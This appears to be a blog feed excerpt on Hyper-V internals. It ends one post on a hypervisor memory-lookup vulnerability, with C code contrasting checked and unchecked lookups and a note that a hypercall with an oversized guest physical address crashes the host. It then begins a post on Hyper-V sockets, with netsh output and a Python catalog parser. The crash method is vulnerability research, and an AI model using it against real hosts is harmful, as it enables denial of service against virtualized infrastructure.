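    uint64_t bad_gpa = 0x200000000000ULL;   /* input_gpa from the article */
    printf("unchecked lookup of 0x%llx would overrun: %s\n",
           (unsigned long long)bad_gpa,
           unchecked_lookup_overruns(GUEST_PAGES, bad_gpa) ? "yes" : "no");
    st = checked_lookup(g_table, GUEST_PAGES, bad_gpa, &spa);
    printf("checked lookup of 0x%llx -> status %d\n", (unsigned long long)bad_gpa, (int)st);
    return 0;
}
```

<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Running it reproduces the arithmetic of the dumps: the last entry sits at table offset 0xffff8 (the ffffc800`000ffff8 address above), GPA 0x1fffffe0 translates to SPA 0x80000000405fffe0 (the MSFTVM02 page), and input_gpa = 200000000000h is rejected before any table access, whereas the unchecked variant would index 0x1000000000 bytes into a 1 MB table, which is the read that faults in the unpatched hypervisor.</span></div>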
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We have seen only one part of the vulnerability. The BSOD is generated by a function we did not consider at the beginning, but without investigating mHandle64VmcallMemory it would be hard to reproduce the vulnerability.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">I use the HvCreatePort hypercall to demonstrate the BSOD, even though the guest OS doesn’t have permission to execute it. But those permissions are checked at a later stage of hypercall handling, after mVmcallHandlersTable has been called, and that allows getting a BSOD even with that hypercall.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Remote code execution was not demonstrated in this article, because I didn’t find a way to do it. I believe that it is a topic for another investigation, in the “not for beginners” class.</span></div>
</div>
Gerhart X (http://www.blogger.com/profile/13830158514949395797), published 2017-09-10, updated 2022-10-27: Hyper-V sockets internals<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="margin-left: 355.85pt;">
<table style="border-collapse: collapse; border: none;"><colgroup><col width="97"></col></colgroup><tbody>
<tr style="height: 33pt;"><td style="padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Gerhart</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">@gerhart_x</span></div>
</td></tr>
</tbody></table>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Terms and definitions</span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 3.3000000000000007pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Root partition (parent OS, root OS) — Windows Server 2016 with Hyper-V installed;</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 3.3000000000000007pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Guest OS (child partition, guest OS) — the virtual machine with Windows Server 2016 Gen2;</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 3.3000000000000007pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Hyper-V TLFS – Hyper-V Top Level Functional Specification.</span></div>
</li>
</ul>
<br /><ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Intro</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2006, the WinHEC conference. Microsoft is actively promoting its own hypervisor (it had no name yet and was designated simply as the “Windows hypervisor”) and even hints that developers will be able to build their own solutions on top of the new virtualization technology:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="123" src="https://lh4.googleusercontent.com/4HDhJ_UHxgWLejHf0tkPJr7lRBQeq5ujYjThts1JR2zhDMjXl09QsALcdsWY46STXPeHVb5dy5-xdfeoj_WZzSWn_wewKq6fdSbeoKFECl-23XpVu5iUuMB2UXnO5lqce0r_mouxgLhNgwUHhg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="163" /></span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="123" src="https://lh6.googleusercontent.com/pwtvO61I1o-iCArmpEgHyEgtXinqW5UHUXjFl1y9icPu8591lWgFsqkyS2dl9UhSM-uXuYu6gwISat64wUdON-ZmvePmMMLU0PawgO9kSMAMcGSBiP879IzZxJon5yuxJjr855sQlhB-eXenkg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="164" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="144" src="https://lh3.googleusercontent.com/4MKgERqnGGkx1FDgezp92P5UBbBGG1T_kMmF60q5hoa60NW2gzFTgjQ9rRdaMtqeaNzDEVijOgFJo7t95TnJrv7KOn6eOG1WWE_Esc0KRBvWO-sCpakGkC7bwkmMFdVYH48fvFxRcCg4imIJfw" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="193" /></span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 28.35pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Indeed, some steps were taken in this direction, and developers got:</span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 53.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.26; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">header files hvgdk.h, vid.h, VidDefs.h (Windows WDK 6.0, 7.1, Singularity OS);</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 53.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.26; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Hyper-V Top Level Functional Specification;</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 53.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.26; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">documentation on MSDN, which generally matched the TLFS but contained more detailed information;</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 53.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.26; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">on osronline.com, the Hyper-V architect Jake Oshins answered driver developers' questions about the Hyper-V environment.</span></div>
</li>
</ul>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Nevertheless, the published information was clearly insufficient for anyone to start developing new products based on Hyper-V (only LiveCloudKd from MoonSols comes to mind, and, apparently, most of the information its developers got came from reverse engineering). Perhaps for this reason, Microsoft's policy changed sharply:</span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 18pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.26; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">the header files were removed from the WDK (some of them still exist in Singularity OS);</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 18pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.26; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">the documentation disappeared from MSDN (on osronline.com a survey was conducted, for formality's sake, on whether the documentation was needed at all: </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://www.osronline.com/showthread.cfm?link=254171</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 18pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.26; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">the Hyper-V extensions for WinDBG (the network virtualization kernel debugger extension nvkd.dll, and hvexts.dll, which WinDBG mentions when connecting to hvix64.exe or hvax64.exe) were never made publicly available;</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 18pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.26; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Jake Oshins (the Hyper-V Architect) disappeared from the osronline.com forum.</span></div>
</li>
</ul>
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Nevertheless, Microsoft itself began to develop Linux Integration Services, a set of modules and drivers that allow Linux to run under Hyper-V. Their source code is integrated into the Linux kernel (2.6.32 and above) and is therefore publicly available. </span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The TLFS remains the only source of information on hypervisor internals; however, the specification issued in February 2017 for Windows Server 2016 contains 238 pages rather than the 420 of the previous specification for Windows Server 2012 R2 (of 23 sections only 16 remain, and the descriptions of many hypercalls disappeared; on the other hand, two sections were added describing VSM, Virtual Secure Mode, and nested virtualization, support for which appeared in Windows Server 2016).</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">But in 2016, in the ws2def.h file (core definitions for the Winsock2 specification) of the Windows SDK 10.0.10586, the following line appeared: </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: grey; font-family: Calibri; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#define</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #6f008a; font-family: Calibri; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AF_HYPERV</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 34</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">and the HvSocket.h header was added to the Windows SDK 10.0.14393. For what purpose?</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">A new feature, PowerShell Direct, was added to Windows Server 2016: it allows PowerShell commands to be run in a guest operating system without a network connection, transmitting all the necessary data over VMBus. The mechanism relies on so-called Hyper-V sockets, which were integrated into the Windows network stack. This article is the result of an attempt to understand how network interaction in Windows works, how built-in support for Hyper-V sockets is constructed, and what the operating system does while the new protocol is in use.</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">First we will consider how the virtualization subsystem was integrated with the Windows network stack, then we will examine the operation of an application that works with Hyper-V sockets, and finally we will learn how the PowerShell Direct technology works. Windows 10 also supports Hyper-V sockets, but the article barely covers it: the emphasis is on the server OS, although presumably there should be no essential difference in implementation.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Before reading the article it is recommended to study section 7, "Network", of the book "Windows Internals, 6th edition". Perhaps by the time this article is published the 7th edition with that chapter (Part II or III) will already be on sale. Also recommended is the excellent article "The Windows Vista/2008 Network Programming Interface: internals, use and subversion", earlier available on wasm.ru and now found on various websites (for example, </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://vxlab.info/wasm/article.php-article=npi_subvert.htm</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">)</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. MSDN also covers the material mentioned in this article in considerable detail, but without the specifics of Hyper-V sockets.</span></div>
<ol start="2" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Components of an operating system</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">First, let us look at the list of providers (Layered Service Providers, LSP) installed in the operating system. We see two entries whose name contains Hyper-V.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="189" src="https://lh6.googleusercontent.com/oCHuMnkMfvNc7NXVXca2aHSDAP0Mggofo3pCSnMTF1ItgnwhYQyPQqGUzPspPQnLZnG36LD_b40tcN_T3UcSfcHwpSKChIghuyeTfkkY68syK4lhPdc38Vw9VNByPtaV1VQWrayo_aMsaLBCzw" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="366" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="121" src="https://lh3.googleusercontent.com/O1BXxFlaPzp-ePkVmDa6TV5O3qDxpDhciwlOkx7iZdET-QqyeKQ1xV8ATjMzWyrM9kz6F4WuSIM-WLJCuRiU6kqvjHoBOgLKJx9lg-zll3fU-Fqh0epHUvkGBzD8ZBdv0CbqCVAskqEhkGO_EA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="367" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">PS C:\Windows\system32> netsh winsock show catalog</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Winsock Catalog Provider Entry</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">------------------------------------------------------</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Entry Type: Base Service Provider</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Description: Hyper-V RAW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Provider ID: {1234191B-4BF7-4CA7-86E0-DFD7C32B5445}</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Provider Path: %SystemRoot%\system32\mswsock.dll</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Catalog Entry ID: 1001</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Version: 2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Address Family: 34</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Max Address Length: 36</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Min Address Length: 36</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Socket Type: 1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Protocol: 1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Service Flags: 0x20026</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Protocol Chain Length: 1</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If we decode Service Flags according to the WSAPROTOCOL_INFO description, we get 0x20026 = XP1_GUARANTEED_DELIVERY | XP1_GUARANTEED_ORDER | XP1_GRACEFUL_CLOSE | XP1_IFS_HANDLES</span></div>
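<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The decoding above can be automated. The following Python script is an added example, not code from the article: it parses the netsh winsock show catalog output shown above, names the XP1_* bits of Service Flags, and checks the Hyper-V RAW entry against the SOCKADDR_HV layout from HvSocket.h (USHORT Family, USHORT Reserved, GUID VmId, GUID ServiceId; that is where the Max/Min Address Length of 36 comes from). The second catalog entry in the sample is constructed, and the all-zero HV_GUID_WILDCARD is used only as a placeholder VmId/ServiceId.</span></div>

```python
"""Added example (not from the article): parse `netsh winsock show catalog`
output, decode Service Flags the way WSAPROTOCOL_INFO defines them, and check
that the Hyper-V RAW entry agrees with SOCKADDR_HV from HvSocket.h."""
import struct
import uuid

AF_HYPERV = 34                        # ws2def.h, Windows SDK 10.0.10586 and later
SOCK_STREAM = 1                       # winsock2.h
HV_PROTOCOL_RAW = 1                   # HvSocket.h
HV_GUID_WILDCARD = uuid.UUID(int=0)   # HvSocket.h: the all-zero GUID

# dwServiceFlags1 bits of WSAPROTOCOL_INFO (winsock2.h).
XP1_FLAGS = {
    0x00000001: "XP1_CONNECTIONLESS",         0x00000002: "XP1_GUARANTEED_DELIVERY",
    0x00000004: "XP1_GUARANTEED_ORDER",       0x00000008: "XP1_MESSAGE_ORIENTED",
    0x00000010: "XP1_PSEUDO_STREAM",          0x00000020: "XP1_GRACEFUL_CLOSE",
    0x00000040: "XP1_EXPEDITED_DATA",         0x00000080: "XP1_CONNECT_DATA",
    0x00000100: "XP1_DISCONNECT_DATA",        0x00000200: "XP1_SUPPORT_BROADCAST",
    0x00000400: "XP1_SUPPORT_MULTIPOINT",     0x00000800: "XP1_MULTIPOINT_CONTROL_PLANE",
    0x00001000: "XP1_MULTIPOINT_DATA_PLANE",  0x00002000: "XP1_QOS_SUPPORTED",
    0x00004000: "XP1_INTERRUPT",              0x00008000: "XP1_UNI_SEND",
    0x00010000: "XP1_UNI_RECV",               0x00020000: "XP1_IFS_HANDLES",
    0x00040000: "XP1_PARTIAL_MESSAGE",        0x00080000: "XP1_SAN_SUPPORT_SDP",
}

# Constructed sample: the Hyper-V RAW entry exactly as the article lists it,
# plus a second, made-up entry so that the AF_HYPERV filter has something to skip.
SAMPLE_CATALOG = r"""
Winsock Catalog Provider Entry
------------------------------------------------------
Entry Type:                         Base Service Provider
Description:                        Hyper-V RAW
Provider ID:                        {1234191B-4BF7-4CA7-86E0-DFD7C32B5445}
Provider Path:                      %SystemRoot%\system32\mswsock.dll
Catalog Entry ID:                   1001
Version:                            2
Address Family:                     34
Max Address Length:                 36
Min Address Length:                 36
Socket Type:                        1
Protocol:                           1
Service Flags:                      0x20026
Protocol Chain Length:              1

Winsock Catalog Provider Entry
------------------------------------------------------
Description:                        Constructed non-Hyper-V entry
Provider Path:                      %SystemRoot%\system32\mswsock.dll
Address Family:                     2
Service Flags:                      0x20066
"""

def parse_catalog(text):
    """Split netsh output into one dict of 'Field: value' pairs per entry."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
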